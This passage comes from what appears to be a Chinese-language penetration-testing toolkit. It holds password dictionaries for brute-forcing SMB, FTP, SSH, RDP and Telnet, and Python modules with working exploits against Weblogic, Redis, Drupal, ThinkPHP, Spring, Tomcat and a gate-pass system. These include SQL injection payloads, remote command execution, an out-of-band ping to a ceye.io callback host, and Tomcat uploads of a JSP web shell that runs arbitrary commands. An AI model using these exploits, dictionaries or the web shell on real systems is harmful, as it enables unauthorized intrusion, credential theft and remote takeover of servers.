44 | 99999999
45 | 333333
46 | 444444
47 | 555555
48 | 999999
49 | 000000
50 | 00000000
51 | 6543210
52 | 111222
53 | asdfghjkl
54 | abc123
55 | 666888
56 | zzzzzz
57 | abcd1234
58 | Guest123
59 | 1234
60 | 12345
61 | ab
62 | abcd
63 | abcde
64 | abcdef
65 | abcdefg
66 | abcdefgh
67 | abcdefghi
68 | Admin123
69 | 123qwe
70 | qazwsx
71 | qweasd
72 | asdfjkl;
73 | `1234567890-=
74 | 1234567890-=
75 | !@#$%^&*()_+
76 | ~!@#$%^&*()_+
77 | fgh@#$
78 |
--------------------------------------------------------------------------------
/bf_dicts/SMB-passwd.txt:
--------------------------------------------------------------------------------
1 | 123
2 | 123123
3 | 123456
4 | 12345678
5 | !@#
6 | !@#$%^
7 | !@#$%^&*
8 | 111111
9 | 666666
10 | abc
11 | test
12 | 888888
13 | qwe!@#
14 | xiaoming
15 | qq123456
16 | taobao
17 | wang1234
18 | 123321
19 | |+_)(
20 | Admin123
21 | 88888888
22 | 66666666
23 | 111111
24 | [level=4]
25 | guest
26 | test123
27 | master
28 | admin
29 | root
30 | 11111111
31 | 000000
32 | 8888
33 | 6666
34 | 123!@#
35 | 00000000
36 | 1234567
37 | aaaaaa
38 | 654321
39 | 999999
40 | 222222
41 | password
42 | abcdefg
43 | woaini
44 | iloveyou
45 | exit
46 | 99999999
47 | 333333
48 | 444444
49 | 555555
50 | 999999
51 | 000000
52 | 00000000
53 | 6543210
54 | 111222
55 | asdfghjkl
56 | abc123
57 | 666888
58 | zzzzzz
59 | abcd1234
60 | Guest123
61 | 1234
62 | 12345
63 | ab
64 | abcd
65 | abcde
66 | abcdef
67 | abcdefg
68 | abcdefgh
69 | abcdefghi
70 | Admin123
71 | 123qwe
72 | qazwsx
73 | qweasd
74 | asdfjkl;
75 | `1234567890-=
76 | 1234567890-=
77 | !@#$%^&*()_+
78 | ~!@#$%^&*()_+
79 |
--------------------------------------------------------------------------------
/weblogic/Main_weblogic.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import os
3 | import re
4 | import weblogic.CVE_2019_2725
5 | import weblogic.CVE_2017_10271
6 | import weblogic.ssrf
7 | import weblogic.weblogic_weakpasswd
8 | import weblogic.CNVD_C_2019_48814
9 | import weblogic.CVE_2017_3506
10 | import weblogic.Common_page
11 |
12 |
13 | def exec(URL):
14 | weblogic.Common_page.attack(URL)
15 | weblogic.CNVD_C_2019_48814.attack(URL)
16 | weblogic.CVE_2017_10271.attack(URL)
17 | weblogic.ssrf.attack(URL)
18 | weblogic.weblogic_weakpasswd.attack(URL)
19 | weblogic.CVE_2019_2725.attack(URL+'/')
20 | weblogic.CVE_2017_3506.attack(URL)
21 |
22 | print('[+]开始检测-Weblogic-CVE-2018-2628。[+]')
23 | # 切换工作路径
24 | os.chdir(os.path.realpath(__file__)[:38])
25 | url = re.findall('//(.*?):', URL, flags=0)[0]
26 | ip = re.findall(r':(.*?)\Z', URL[6:], flags=0)[0]
27 | os.system(f"py -2 CVE_2018_2628.py {url} {ip}")
28 | print('[+]检测结束-Weblogic-CVE-2018-2628。[+]')
29 |
30 |
31 | if __name__ == "__main__":
32 | exec()
33 |
--------------------------------------------------------------------------------
/bf_dicts/FTP-passwd.txt:
--------------------------------------------------------------------------------
1 | pssword
2 | 123
3 | 123123
4 | 123456
5 | 12345678
6 | test
7 | xiaoming
8 | !@#
9 | !@#$%^
10 | !@#$%^&*
11 | 111111
12 | 666666
13 | abc
14 | 888888
15 | qq123456
16 | qwe!@#
17 | taobao
18 | wang1234
19 | qwe!@#123
20 | 123321
21 | |+_)(
22 | Admin123
23 | 88888888
24 | 66666666
25 | 111111
26 | guest
27 | test123
28 | master
29 | admin
30 | root
31 | 11111111
32 | 000000
33 | 8888
34 | 6666
35 | 123!@#
36 | 00000000
37 | 1234567
38 | aaaaaa
39 | 654321
40 | 999999
41 | 222222
42 | password
43 | abcdefg
44 | woaini
45 | iloveyou
46 | exit
47 | 99999999
48 | 333333
49 | 444444
50 | 555555
51 | 999999
52 | 000000
53 | 00000000
54 | 6543210
55 | 111222
56 | asdfghjkl
57 | abc123
58 | 666888
59 | zzzzzz
60 | abcd1234
61 | Guest123
62 | 1234
63 | 12345
64 | ab
65 | abcd
66 | abcde
67 | abcdef
68 | abcdefg
69 | abcdefgh
70 | abcdefghi
71 | Admin123
72 | 123qwe
73 | qazwsx
74 | qweasd
75 | asdfjkl;
76 | `1234567890-=
77 | 1234567890-=
78 | !@#$%^&*()_+
79 | ~!@#$%^&*()_+
80 |
--------------------------------------------------------------------------------
/bf_dicts/SSH-passwd.txt:
--------------------------------------------------------------------------------
1 | nsfocus123
2 | 123
3 | 123123
4 | 123456
5 | 12345678
6 | !@#
7 | !@#$%^
8 | !@#$%^&*
9 | 111111
10 | 666666
11 | abc
12 | test
13 | 888888
14 | xiaoming
15 | qwe!@#
16 | 123321
17 | |+_)(
18 | qwe!@#123
19 | Admin123
20 | 88888888
21 | 66666666
22 | 111111
23 | guest
24 | test123
25 | master
26 | admin
27 | root
28 | 11111111
29 | 000000
30 | 8888
31 | 6666
32 | 123!@#
33 | 00000000
34 | 1234567
35 | aaaaaa
36 | 654321
37 | 999999
38 | 222222
39 | password
40 | abcdefg
41 | woaini
42 | iloveyou
43 | qq123456
44 | taobao
45 | wang1234
46 | exit
47 | 99999999
48 | 333333
49 | 444444
50 | 555555
51 | 999999
52 | 000000
53 | 00000000
54 | 6543210
55 | 111222
56 | asdfghjkl
57 | abc123
58 | 666888
59 | zzzzzz
60 | abcd1234
61 | Guest123
62 | 1234
63 | 12345
64 | ab
65 | abcd
66 | abcde
67 | abcdef
68 | abcdefg
69 | abcdefgh
70 | abcdefghi
71 | Admin123
72 | 123qwe
73 | qazwsx
74 | qweasd
75 | asdfjkl;
76 | `1234567890-=
77 | 1234567890-=
78 | !@#$%^&*()_+
79 | ~!@#$%^&*()_+
80 |
--------------------------------------------------------------------------------
/redis_vuln/redis_unauthorized.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import redis
3 | import re
4 |
5 | '''
6 | Usage:
7 | moon.py -u redis http://127.0.0.1:6379
8 | redis未授权访问漏洞
9 | '''
10 |
11 |
12 | def attack(URL):
13 | print('[+]开始检测-Redis未授权访问漏洞。[+]')
14 | # print(re.findall('//(.*?):',URL)[0])#获取IP
15 | # print(re.findall(':(\w*?)$',URL)[0])#获取端口
16 | try:
17 | r = redis.StrictRedis(host=re.findall('//(.*?):',URL)[0], port=re.findall(':(\w*?)$',URL)[0], db=0)
18 | print('获取连接成功。客户列表为:'+str(r.client_list()))
19 | except IndexError:
20 | try:
21 | r = redis.StrictRedis(host=re.findall('(.*?):', URL)[0], port=re.findall(':(\w*?)$', URL)[0], db=0)
22 | print('获取连接成功。客户列表为:' + str(r.client_list()))
23 | except redis.exceptions.ResponseError:
24 | print('[-]访问受限:NOAUTH Authentication required')
25 | except redis.exceptions.ConnectionError:
26 | print('获取连接失败。')
27 |
28 | print('[+]检测结束-Redis未授权访问漏洞。[+]')
29 |
30 |
31 | if __name__ == "__main__":
32 | attack()
33 |
--------------------------------------------------------------------------------
/bf_dicts/RDP-passwd.txt:
--------------------------------------------------------------------------------
1 | 456852ASDwsx.
2 |
3 | 123
4 | 123123
5 | 123456
6 | 12345678
7 | !@#
8 | !@#$%^
9 | !@#$%^&*
10 | 111111
11 | 666666
12 | abc
13 | test
14 | 888888
15 | qwe!@#
16 | xiaoming
17 | qq123456
18 | taobao
19 | wang1234
20 | [level=3]
21 | 123321
22 | 1234
23 | |+_)(
24 | Admin123
25 | 88888888
26 | 66666666
27 | 111111
28 | guest
29 | test123
30 | master
31 | admin
32 | root
33 | 11111111
34 | 000000
35 | 8888
36 | 6666
37 | 123!@#
38 | 00000000
39 | 1234567
40 | aaaaaa
41 | 654321
42 | 999999
43 | 222222
44 | password
45 | abcdefg
46 | woaini
47 | iloveyou
48 | exit
49 | 99999999
50 | 333333
51 | 444444
52 | 555555
53 | 999999
54 | 000000
55 | 00000000
56 | 6543210
57 | 111222
58 | asdfghjkl
59 | abc123
60 | 666888
61 | zzzzzz
62 | abcd1234
63 | Guest123
64 | 1234
65 | 12345
66 | ab
67 | abcd
68 | abcde
69 | abcdef
70 | abcdefg
71 | abcdefgh
72 | abcdefghi
73 | Admin123
74 | 123qwe
75 | qazwsx
76 | qweasd
77 | asdfjkl;
78 | `1234567890-=
79 | 1234567890-=
80 | !@#$%^&*()_+
81 | ~!@#$%^&*()_+
82 |
--------------------------------------------------------------------------------
/durpal/CVE_2018_7600.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import requests
3 | # https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py
4 |
5 | '''
6 | Usage:
7 | moon.py -u drupal http://127.0.0.1:8080
8 | Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)
9 | '''
10 |
11 |
12 | def attack(URL):
13 | print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
14 | url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
15 | payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "^w^" | tee hello.txt'}
16 | # print(url)
17 | try:
18 | r = requests.post(url, data=payload, verify=False)
19 | check = requests.get(URL + '/hello.txt', verify=False)
20 | if check.status_code != 200:
21 | sys.exit("Not exploitable")
22 | print('error!')
23 | print('可能存在漏洞-Check: ' + URL + '/hello.txt ^w^')
24 | except:
25 | print('someerroe!')
26 | print('[+]检测结束-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
27 | print('\n')
28 |
29 | if __name__ == "__main__":
30 | attack()
31 |
--------------------------------------------------------------------------------
/gatepass_vuln/Gate_Pass_Management_System_login_SQL_Injection.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | import requests
4 |
5 | '''
6 | Gate Pass Management System 2.1 - 'login' SQL Injection
7 | 发现时间:2018-11-02
8 | 参考:https://www.exploit-db.com/exploits/45766/
9 | moon.py -u gatepass http:xx.xx.xx.xx:xx 登录界面
10 | '''
11 |
12 | def attack(URL):
13 | print('[+]开始检测-Gate_Pass_Management_System_login_SQL_Injection。[+]')
14 | url = URL + '/login-exec.php'
15 | data = {
16 | #'login': 'admin','password': '123456',
17 | 'login': r"'or 1=1 or ''='", 'password': r"'or 1=1 or ''='",
18 | 'Submit': 'value',
19 | }
20 | try:
21 | r = requests.post(url,data=data)
22 | if 'Please check your username and password' in r.text:
23 | print('[-]账户密码错误,绕过登录失败,不存在漏洞。')
24 | print('检测页面:'+url)
25 | elif 'Industronics Engineering' in r.text:
26 | print('[+]绕过登录成功,存在sql注入漏洞。')
27 | print('漏洞连接:'+url)
28 | print("利用方法:login='or 1=1 or ''='&password='or 1=1 or ''='&Submit=Login")
29 | else:
30 | print('[!]检测时发生错误,可能不存在漏洞页面。')
31 | except:
32 | print('[!]连接端口时发生错误。')
33 | print('[+]检测完成-Gate_Pass_Management_System_login_SQL_Injection。[+]')
34 | print('\n')
35 | if __name__ == "__main__":
36 | attack()
37 |
--------------------------------------------------------------------------------
/thinkphp/thinkphp5_inj_info.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | from bs4 import BeautifulSoup
4 |
5 | '''
6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx
7 | ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
8 | 启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来。
9 | '''
10 |
11 |
12 | def attack(url):
13 | print('[+]开始检测 thinkphp5_inj_info !')
14 | URL1 = url + '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1'
15 | try:
16 | re = requests.get(URL1, verify=False, timeout=10)
17 | except Exception:
18 | print('[-]访问漏洞页面失败,未发现该漏洞!')
19 | print('\n')
20 | else:
21 | if re.status_code == 500 and 'SQLSTATE' in re.text:
22 | print('[+]存在风险页面,开始检测:', URL1)
23 | try:
24 | # print(re.text)
25 | soup=BeautifulSoup(re.content,"lxml")
26 | print('[+]获得账户数据如下,数据库连接数据请前往页面自行查找:')
27 | print(soup.find_all('h1')[0].get_text())
28 | print('[+]漏洞检测结束,存在 thinkphp5_inj_info !')
29 | print('\n')
30 | except Exception:
31 | print('[-]获取数据出错!请自行访问页面判断.')
32 | print('\n')
33 | else:
34 | print('[-]访问漏洞页面失败,未发现该漏洞:', URL1, re.status_code)
35 | print('\n')
36 |
37 |
38 | if __name__ == "__main__":
39 | attack()
40 |
--------------------------------------------------------------------------------
/durpal/CVE_2014_3704.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | from bs4 import BeautifulSoup
3 | import requests
4 |
5 | '''
6 | Usage:
7 | moon.py -u drupal http://127.0.0.1:8080
8 | Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
9 | '''
10 |
11 |
12 | def attack(URL):
13 | url = URL+'/?q=node&destination=node'
14 | print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
15 |
16 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
17 | Content_Type = "application/x-www-form-urlencoded"
18 | headers = {"User-Agent":user_agent,"Content-Type":Content_Type}
19 |
20 | data = 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
21 | try:
22 | r = requests.post(url,data=data, headers=headers, verify=False)
23 | soup = BeautifulSoup(r.content,"lxml")
24 | print('请查看以下内容中是否有 用户名+@+IP 的注入结果:')
25 | print('--------------------')
26 | print(str(soup.find_all('li')[2])[100:135])#截取注入结果的那一段字符出来
27 | print('--------------------')
28 | except Exception:
29 | print('someerror!')
30 | print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
31 | print('\n')
32 |
33 |
34 | if __name__ == "__main__":
35 | attack()
36 |
--------------------------------------------------------------------------------
/weblogic/Common_page.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 | '''
5 | Usage:
6 | moon.py -u weblogic http://127.0.0.1:8080
7 | 用来查看weblogic常见的4个页面
8 | '''
9 |
10 | def attack(URL):
11 | urls = (
12 | '/console/login/LoginForm.jsp',
13 | '/wls-wsat/CoordinatorPortType',
14 | '/_async/AsyncResponseService',
15 | '/ws_utc/config.do'
16 | )
17 |
18 | print('[+]开始检测-Weblogic-common_page。[+]')
19 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
20 | headers={"User-Agent":user_agent}
21 | for url in urls:
22 | url = URL + url
23 | try:
24 | verify_response = requests.get(url, headers=headers)
25 |
26 | if verify_response.status_code == 200:
27 | try:
28 | print('[*]页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断
29 | except Exception:
30 | pass
31 | else:
32 | print('未发现页面:'+url)
33 | continue
34 | except Exception:
35 | print("[-]访问页面出错!")
36 | print('[+]检测结束-Weblogic-common_page。[+]')
37 | print('\n')
38 |
39 | if __name__ == "__main__":
40 | attack()
41 |
--------------------------------------------------------------------------------
/thinkphp/thinkphp5_x_rce.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | from bs4 import BeautifulSoup
4 |
5 | '''
6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx
7 | ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
8 | 直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:
9 | '''
10 |
11 |
12 | def attack(url):
13 | print('[+]开始检测 thinkphp5.x_rce !')
14 | URL1 = url + r'/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1'
15 | try:
16 | re = requests.get(URL1, verify=False, timeout=10)
17 | except Exception:
18 | print('[-]访问漏洞页面失败,未发现该漏洞!')
19 | print('\n')
20 | else:
21 | if re.status_code == 500 and 'PHP' in re.text and 'System ' in re.text:
22 | print('[+]phpinfo成功执行:', URL1)
23 | try:
24 | soup=BeautifulSoup(re.content,"lxml")
25 | print('[+]获取到的php版本如下:')
26 | print(soup.find_all('h1')[0].get_text())
27 | print('[+]漏洞检测结束,存在 thinkphp5.x_rce !')
28 | print('\n')
29 | except Exception:
30 | print('[-]获取数据出错!请自行访问页面判断.')
31 | print('\n')
32 | else:
33 | print('[-]访问漏洞页面失败,未发现该漏洞:', URL1, re.status_code)
34 | print('\n')
35 |
36 |
37 | if __name__ == "__main__":
38 | attack()
39 |
--------------------------------------------------------------------------------
/spring_vuln/CVE_2018_1273.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | import random
4 |
5 | '''
6 | moon.py -u spring http://xxxx.xxxx.xxxx.xxxx:xx
7 | 这里利用脚本针对的是spring官方的web样例中的注册页面,实际中未必适用
8 | '''
9 |
10 |
11 | def attack(url):
12 | URL1 = url + '/users'
13 | try:
14 | re = requests.get(URL1, verify=False, timeout=5)
15 | except Exception:
16 | print('Some error!')
17 | else:
18 | if re.status_code == 200:
19 | print('[+]存在风险页面,开始检测:', URL1)
20 | try:
21 | URL2 = url + '/users?page=&size=5'
22 | headers = {"User-Agent": 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36',
23 | "Referer": URL1,
24 | "Content-Type": 'application/x-www-form-urlencoded'
25 | }
26 | randomint = random.randint(100000, 999999)
27 | data = f'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping {randomint}_CVE_2018_1273.e7wqoz.ceye.io")]=&password=&repeatedPassword='
28 | re1 = requests.post(URL2, data=data, headers=headers)
29 | print('一般执行成功返回值为500,此次返回值为:', re1.status_code)
30 | print('此处利用ceye来确认漏洞,请登录相关账户进行确认:', f" {randomint}_CVE_2018_1273.e7wqoz.ceye.io")
31 | except Exception:
32 | print('[-]执行payload出错!')
33 | else:
34 | print('[-]未发现漏洞页面:', URL1, re.status_code)
35 |
36 |
37 | if __name__ == "__main__":
38 | attack()
39 |
--------------------------------------------------------------------------------
/bf_dicts/TELNET-passwd.txt:
--------------------------------------------------------------------------------
1 | 123
2 | test
3 | admin
4 | cisco
5 | netadmin
6 | private
7 | 1234
8 | root
9 | super
10 | router
11 | public
12 | pento
13 | password
14 | 123456
15 | sysadm
16 | default
17 | qwe!@#
18 | switch
19 | backdoor
20 | recovery
21 | secure
22 | anicust
23 | d.e.b.u.g
24 | ADTRAN
25 | installer
26 | surt
27 | NetICs
28 | adminttd
29 | D-Link
30 | tech
31 | private
32 | synnet
33 | adtran
34 | hello
35 | security
36 | guest
37 | smile
38 | support
39 | PASSWORD
40 | changeme2
41 | ascend
42 | netopia
43 | echo
44 | pass
45 | corecess
46 | Manager
47 | secret
48 | BRIDGE
49 | atc123
50 | Password
51 | superuser
52 | 123456
53 | emradmin
54 | 12345678
55 | 123321
56 | |+_)(
57 | Admin123
58 | 88888888
59 | 66666666
60 | 111111
61 | guest
62 | test123
63 | master
64 | admin
65 | root
66 | 11111111
67 | 000000
68 | 8888
69 | 6666
70 | 123!@#
71 | 00000000
72 | 1234567
73 | aaaaaa
74 | 654321
75 | 999999
76 | 222222
77 | password
78 | abcdefg
79 | woaini
80 | iloveyou
81 | exit
82 | 99999999
83 | 333333
84 | 444444
85 | 555555
86 | 999999
87 | 000000
88 | 00000000
89 | 6543210
90 | 111222
91 | asdfghjkl
92 | abc123
93 | 666888
94 | zzzzzz
95 | abcd1234
96 | Guest123
97 | 1234
98 | 12345
99 | ab
100 | abcd
101 | abcde
102 | abcdef
103 | abcdefg
104 | abcdefgh
105 | abcdefghi
106 | Admin123
107 | 123qwe
108 | qazwsx
109 | qweasd
110 | asdfjkl;
111 | `1234567890-=
112 | 1234567890-=
113 | !@#$%^&*()_+
114 | ~!@#$%^&*()_+
115 | qwe!@#123
116 |
--------------------------------------------------------------------------------
/tomcat/tomcat_weakpasswd.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | import base64
4 | import urllib3
5 |
6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
7 | '''
8 | Usage:
9 | moon.py -u tomcat http://127.0.0.1:8080
10 | 爆破tomcat用户名账户密码。
11 | '''
12 |
13 | def attack(URL):
14 | print('[+]开始检测-Tomcat-weak_pawsswd漏洞。[+]')
15 | #设定用于爆破的账户密码
16 | accounts = ['admin', 'tomcat', 'role1', 'manager', 'both']
17 | passwds = ['123456', '1234', '12345678', 'admin', 'tomcat']
18 | for account in accounts:
19 | for passwd in passwds:
20 | txt = account+':'+passwd
21 | encodestr = base64.b64encode(txt.encode('utf-8'))#使用base64加密爆破字符串
22 | encodestr = str(encodestr, 'utf-8')#将 b'' 这类的东西去掉
23 | url = URL + '/manager/html'
24 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
25 | Authorization = f'Basic {encodestr}'
26 | headers = {"User-Agent": user_agent,"Authorization":Authorization}
27 | try:
28 | r = requests.get(url,headers=headers, verify=False)
29 | if r.status_code == 200 and 'Tomcat Web Application Manager' in r.text:
30 | print('[+]发现弱口令'+ txt)
31 | elif r.status_code == 401:
32 | print('账户密码错误:', txt)
33 | else:
34 | print('[-]爆破密码出错。')
35 | except:
36 | print('[-]访问管理页面出错')
37 | print('[+]检测结束-Tomcat-weak_pawsswd漏洞。[+]')
38 | print('\n')
39 |
40 | if __name__ == "__main__":
41 | attack()
42 |
--------------------------------------------------------------------------------
/thinkphp/thinkphp_before5_0_23_rce.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | from bs4 import BeautifulSoup
4 |
5 | '''
6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx
7 | ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
8 |
9 | POST /index.php?s=captcha HTTP/1.1
10 | Host: localhost
11 | Accept-Encoding: gzip, deflate
12 | Accept: */*
13 | Accept-Language: en
14 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
15 | Connection: close
16 | Content-Type: application/x-www-form-urlencoded
17 | Content-Length: 72
18 |
19 | _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
20 | '''
21 |
22 |
23 | def attack(url):
24 | print('[+]开始检测 thinkphp_before5.0.23_rce !')
25 | URL1 = url + r'/index.php?s=captcha'
26 | try:
27 | data = {'_method': '__construct', 'filter[]': 'system', 'method': 'get', 'server[REQUEST_METHOD]': 'ls'}
28 | re = requests.post(URL1, data=data, verify=False, timeout=10)
29 | except Exception:
30 | print('[-]访问漏洞页面失败,未发现该漏洞!')
31 | print('\n')
32 | else:
33 | if re.status_code == 200 and 'System Error' in re.text:
34 | print('[+]命令成功执行,获取到的目录如下:')
35 | try:
36 | print(re.text[:80])
37 | print('[+]漏洞检测结束,存在 thinkphp_before5.0.23_rce !')
38 | print('\n')
39 | except Exception:
40 | print('[-]获取数据出错!请自行访问页面判断.')
41 | print('\n')
42 | else:
43 | print('[-]访问漏洞页面失败,未发现该漏洞', URL1, re.status_code)
44 | print('\n')
45 |
46 |
47 | if __name__ == "__main__":
48 | attack()
49 |
--------------------------------------------------------------------------------
/tomcat/CVE_2017_12615.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import sys
3 | import requests
4 | import time
5 |
6 | '''
7 | Usage:
8 | moon.py -u tomcat http://127.0.0.1:8080
9 | shell: http://127.0.0.1:8080/201712615.jsp?pwd=fff&cmd=whoami
10 | 影响范围:Linux/Windows Tomcat: 7.0.0 to 7.0.79 - 官网数据
11 | 成因:Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件
12 | 最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true
13 | '''
14 |
15 | def attack(URL):
16 | print('[+]开始检测-Tomcat-CVE-2017-12615。[+]')
17 | url = URL + '/T68t8YT86.jsp/'
18 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
19 | headers={"User-Agent":user_agent}
20 | data="""CVE-2017-12615
21 | <%
22 | if("fff".equals(request.getParameter("pwd"))){
23 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
24 | int a = -1;
25 | byte[] b = new byte[2048];
26 | out.print("");
27 | while((a=in.read(b))!=-1){
28 | out.println(new String(b));
29 | }
30 | out.print("");
31 | }
32 | %>"""
33 | try:
34 | requests.put(url, headers=headers, data=data)
35 | time.sleep(2)
36 | verify_response = requests.get(url[:-1], headers=headers)
37 | if verify_response.status_code == 200 and 'CVE-2017-12615' in verify_response.text:
38 | print('存在-Tomcat-CVE-2017-12615!!!')
39 | print('shell: ' + url[:-1]+'?pwd=fff&cmd=whoami')
40 | else :
41 | print('访问shell地址:'+verify_response.status_code)
42 | print("未发现-Tomcat-CVE-2017-12615。")
43 | except :
44 | print("未发现-Tomcat-CVE-2017-12615。")
45 | print('[+]检测结束-Tomcat-CVE-2017-12615。[+]')
46 | print('\n')
47 |
48 | if __name__ == "__main__":
49 | attack()
--------------------------------------------------------------------------------
/weblogic/weblogic_weakpasswd.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 |
4 |
5 | '''
6 | Usage:
7 | moon.py -u tomcat http://127.0.0.1:8080
8 | 爆破weblogic用户名账户密码。
9 | '''
10 |
11 | def attack(URL):
12 | print('[+]开始检测-weblogic-weak_pawsswd漏洞。[+]')
13 |
14 | #设定用于爆破的账户密码
15 | a = 0
16 | accounts = ['guest','WebLogic', 'weblogic', 'Oracle@123', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem','portaladmin','mary']
17 | passwds = ['guest','weblogic1','WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe','wlcsystem', 'wlpisystem','passwd','portaladmin']
18 | for account in accounts:
19 | for passwd in passwds:
20 | url = URL + '/console/j_security_check'
21 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
22 | headers = {"User-Agent": user_agent}
23 | data = {'j_username':account,'j_password':passwd,'j_character_encoding':'UTF-8'}
24 | try:
25 | r = requests.post(url,headers=headers,data=data, verify=False)
26 | if 'Oracle WebLogic Server Administration Console' in r.text:
27 | pass
28 | elif 'Home Page - base_domain - WLS Console' in r.text:
29 | print('登录页面'+url)
30 | print('[+]发现弱口令:'+account+' '+passwd+'漏洞检测结束!')
31 | a = 1
32 | else:
33 | pass
34 | # print('[-]爆破发生错误,请检查网页是否可访问!')
35 | except:
36 | print('[-]访问weblogic登录页面出错,漏洞检测结束!')
37 | if a == 0:
38 | print('[-]检测结束未发现weblogic-weak_pawsswd弱口令。[-]')
39 | else:
40 | pass
41 | print('\n')
42 |
43 | if __name__ == "__main__":
44 | attack()
--------------------------------------------------------------------------------
/tomcat/CVE_2017_12617.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import string
4 | from random import *
5 | import requests
6 | import urllib3
7 |
8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
9 |
10 | '''
11 | Usage:
12 | moon.py -u tomcat http://127.0.0.1:8080
13 | shell: http://127.0.0.1:8080/201712615.jsp?pwd=fff&cmd=whoami
14 | '''
15 |
16 | def gen_shell():
17 | min_char = 4
18 | max_char = 12
19 | allchar = string.ascii_letters + string.digits
20 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char)))
21 | return shell_name + ".jsp"
22 |
23 | def construct_put(url, f):
24 | #print(url)
25 | evil = """CVE-2017-12617
26 | <%
27 | if("fff".equals(request.getParameter("pwd"))){
28 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
29 | int a = -1;
30 | byte[] b = new byte[2048];
31 | out.print("");
32 | while((a=in.read(b))!=-1){
33 | out.println(new String(b));
34 | }
35 | out.print("");
36 | }
37 | %>"""
38 | headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
39 | req = requests.put(str(url) +'/'+ str(f) + "/", data=evil, headers=headers, verify=False)
40 | #print(req.status_code)
41 | if req.status_code == 201:
42 | #print("File Created ..")
43 | print('发现-Tomcat-CVE-2017-12617!!!')
44 | print('Shell地址:'+(str(url) +'/'+ str(f))+'?pwd=fff&cmd=whoami')
45 | else:
